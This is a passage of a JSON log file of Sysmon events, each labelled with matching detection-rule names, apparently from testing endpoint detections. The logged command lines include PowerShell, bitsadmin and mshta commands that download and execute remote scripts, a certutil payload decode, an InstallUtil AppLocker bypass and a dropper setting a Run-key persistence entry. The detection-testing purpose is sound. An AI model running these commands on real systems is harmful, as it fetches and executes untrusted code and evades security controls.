11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 
15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-27 
15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 
15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution_attributes":{"ProcessID":1912,"ThreadID":996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 